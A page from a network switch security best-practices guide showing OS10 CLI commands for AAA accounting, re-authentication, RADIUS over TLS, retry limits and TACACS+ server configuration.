API Guide
● stop-only—Send only a stop notice when a process ends.
● none—No accounting notices are sent.
● logging—Logs all accounting notices in syslog.
● group tacacs+—Logs all accounting notices on the first reachable TACACS+ server.
The authentication methods in the method list work in the order they are configured.
Enable AAA re-authentication or enable mode
Rationale: Prevent users from accessing resources, perform tasks that they are not authorized to perform, and require users to
reauthenticate by logging in again when an authentication method or server changes.
Configuration:
OS10(config)# aaa re-authenticate enable
Configure RADIUS authentication
Rationale: Traditional RADIUS-based user authentication runs over UDP and uses the MD5 message-digest algorithm for
secure communications. To provide enhanced security in RADIUS user authentication exchanges, RFC 6614 defines the RADIUS
over Transport Layer Security (TLS) protocol. RADIUS over TLS secures the entire authentication exchange in a TLS connection
and provides additional security.
Configuration:
OS10(config)# radius-server host {hostname | ip-address} tls security-profile profile-
name [auth-port port-number] key {0 authentication-key | 9 authentication-key |
authentication-key}
OS10(config)# exit
OS10# write memory
● hostname—Enter the hostname of the RADIUS server.
● ip-address—Enter the IPv4 (A.B.C.D) or IPv6 (x:x:x:x::x) address of the RADIUS server.
● tls security-profile profile-name—Enter the security profile to use the X.509v3 certificate on the switch to
use for TLS authentication with a RADIUS server.
● key 0 authentication-key—Enter an authentication key in plain text. A maximum of 42 characters.
● key 9 authentication-key—Enter an authentication key in encrypted format. A maximum of 128 characters.
● authentication-key—Enter an authentication in plain text. A maximum of 42 characters. It is not necessary to enter 0
before the key.
● auth-port port-number—(Optional) Enter the UDP port number used on the server for authentication, from 0 to
65535, default 1812.
● key authentication-key—(Optional) Enter the authentication key to authenticate the device on the server. A
maximum of 42 characters; default radius_secure.
Configure RADIUS authentication retries
Rationale: Configure the number of times OS10 retransmits a RADIUS authentication request. To avoid unnecessary retries,
configure a lower value.
Configuration:
OS10(config)# radius-server retransmit retries
OS10(config)# exit
OS10# write memory
retries—Enter the number of retry attempts, from 0 to 100.
Configure TACACS+ authentication
Rationale: Configure the global timeout used to wait for an authentication response from TACACS+ servers. To avoid long
waiting, configure a lower value.
Configuration:
OS10(config)# tacacs-server host {hostname | ip-address} key {0 authentication-key | 9
authentication-key | authentication-key} [auth-port port-number]
OS10(config)# exit
OS10# write memory
14
OS10 security best practices